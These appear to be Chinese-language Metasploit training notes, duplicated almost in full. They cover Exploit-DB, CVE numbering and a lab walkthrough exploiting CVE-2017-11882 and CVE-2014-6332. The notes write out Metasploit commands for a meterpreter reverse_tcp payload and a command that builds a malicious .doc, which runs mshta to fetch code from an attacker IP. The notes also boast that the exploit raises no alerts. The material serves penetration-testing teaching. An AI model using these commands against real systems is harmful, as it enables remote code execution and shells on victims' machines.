Metasploit 進階第二講 框架更新
EDB平台-互聯網安全漏洞庫
Exploit_DB是一個面向全世界安全工作人員的漏洞提交平台,是一份公開已知漏洞的存檔,便於企業改善公司的安全情況,同時幫助安全研究人員及滲透測試工程師進行更好的安全測試工作。
exploits:漏洞信息
papers:文章
GHDB: Google hacking
shellcodes:填充數據
CVE-2017-11882介紹
CVE-2017-11882Ofice遠程代碼執行漏洞:
由Microsoft office中的公式編輯器造成,該模塊以OLE(Object Linking and Embedding,對象鏈接與嵌入)技術將公式嵌入在Office文檔內,由於編輯器沒有對名稱長度進行校驗,導致緩沖區溢出,若攻擊者通過構造特殊字符,office無法正確處理內存對象,成功利用該漏洞的攻擊者將能以當前用戶身份在目標操作系統執行任意代碼。
完美無彈窗,無異常,影響office全版本。
CVE和MS:
CVE是Common Vulnerabilities and Exposures的縮寫,意思是公共漏洞及披露。它是一個漏洞字典,由MITRE維護,給每個暴露出來漏洞給一個公共的名稱。可以在cve.mitre.org/cve/index.html中查看漏洞列表。
MS是微軟維護的自身的漏洞列表。可以在technet.microsoft.com/en-
us/security/bulletins查找最新的各種相關信息。
由於兩者標准不統一,為了更好對應,MITRE提供一個對應列表cve.mitre.org/data/refs/refmap/source-MS.html。
MSF添加exploit及更新Metasploit框架
添加exploit:
1.將下載的rb文件放入對應的文件夾下
2.執行reload_all或重新啟動MSF
更新metasploit框架:
apt update;apt install metasploit-framework
實操:利用CVE-2017-11882攻擊目標主機
MSF:
search 2017_11882
use exploit/windows/...
info
show options
set uripath/
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.24.137
run
生成POC程序(帶有shell的doc文件):
python CVE-2017-11882.py -c“mshta
http://192.168.24.137:8080/"-o11882.doc
其他POC程序生成:
https://github.com/Ridter/CVE-2017-11882
python CVE-2017-11882.py-c"cmd.exe/c
calc.cxe" –o 11882.doc
metasploit攻擊win8實例
Microsoft Windows OLE遠程代碼執行漏洞(CVE-2014-6332、MS14-064):
OLE(對象鏈接與嵌入)是一種允許應用程序共享數據和功能的技術。
Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008
SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012
Gold/R2,Windows RT Gold/8.1版本在實現上存在Windows OLE自動化數組遠程代碼執行漏洞,遠程攻擊者利用此漏洞構造特殊的網頁,用戶使用IE瀏覽器查看網頁時允許遠程執行任意代碼。
可能會遇到的問題:
1.Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)
lsof-i:4444 -> kill -9 PID(man lsof -> man kill)
2.注意查看報錯信息,多檢索
metasploit框架打開方式:
msfconsole 啟動命令行模式
armitage 啟動圖形化界面方式
Metasploit 進階第二講
框架更新
01 Exploit_db平台介紹
02 MSF添加exploit更新MSF
03 CVE-2017-11882利用實例
04合天網安實驗室攻擊win8實例
EDB平台-互聯網安全漏洞庫
Exploit_DB是一個面向全世界安全工作人員的漏洞提交平台,是一份公開已知漏洞的存檔,便於企業改善公司的安全情況,同時幫助安全研究人員及滲透測試工程師進行更好的安全測試工作。
exploits:漏洞信息
papers:文章
GHDB: Google hacking
shellcodes:填充數據
CVE-2017-11882介紹
CVE-2017-11882Ofice遠程代碼執行漏洞:
由Microsoft office中的公式編輯器造成,該模塊以OLE(Object Linking and Embedding,對象鏈接與嵌入)技術將公式嵌入在Office文檔內,由於編輯器沒有對名稱長度進行校驗,導致緩沖區溢出,若攻擊者通過構造特殊字符,office無法正確處理內存對象,成功利用該漏洞的攻擊者將能以當前用戶身份在目標操作系統執行任意代碼。
完美無彈窗,無異常,影響office全版本。
CVE和MS:
CVE是Common Vulnerabilities and Exposures的縮寫,意思是公共漏洞及披露。它是一個漏洞字典,由MITRE維護,給每個暴露出來漏洞給一個公共的名稱。可以在cve.mitre.org/cve/index.html中查看漏洞列表。
MS是微軟維護的自身的漏洞列表。可以在technet.microsoft.com/en-
us/security/bulletins查找最新的各種相關信息。
由於兩者標准不統一,為了更好對應,MITRE提供一個對應列表cve.mitre.org/data/refs/refmap/source-MS.html。
MSF添加exploit及更新Metasploit框架
添加exploit:
1.將下載的rb文件放入對應的文件夾下
2.執行reload_all或重新啟動MSF
更新metasploit框架:
apt update;apt install metasploit-framework
實操:利用CVE-2017-11882攻擊目標主機
MSF:
search 2017_11882
use exploit/windows/...
info
show options
set uripath/
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.24.137
run
生成POC程序(帶有shell的doc文件):
python CVE-2017-11882.py -c“mshta
http://192.168.24.137:8080/"-o11882.doc
其他POC程序生成:
https://github.com/Ridter/CVE-2017-11882
python CVE-2017-11882.py-c"cmd.exe/c
calc.cxe" –o 11882.doc
合天網安實驗室:metasploit攻擊win8實例
Microsoft Windows OLE遠程代碼執行漏洞(CVE-2014-6332、MS14-064):
OLE(對象鏈接與嵌入)是一種允許應用程序共享數據和功能的技術。
Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008
SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012
Gold/R2,Windows RT Gold/8.1版本在實現上存在Windows OLE自動化數組遠程代碼執行漏洞,遠程攻擊者利用此漏洞構造特殊的網頁,用戶使用IE瀏覽
器查看網頁時允許遠程執行任意代碼。
可能會遇到的問題:
- Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)
lsof-i:4444 -> kill -9 PID(man lsof -> man kill)
2.注意查看報錯信息,多檢索
metasploit框架打開方式:
msfconsole 啟動命令行模式
armitage 啟動圖形化界面方式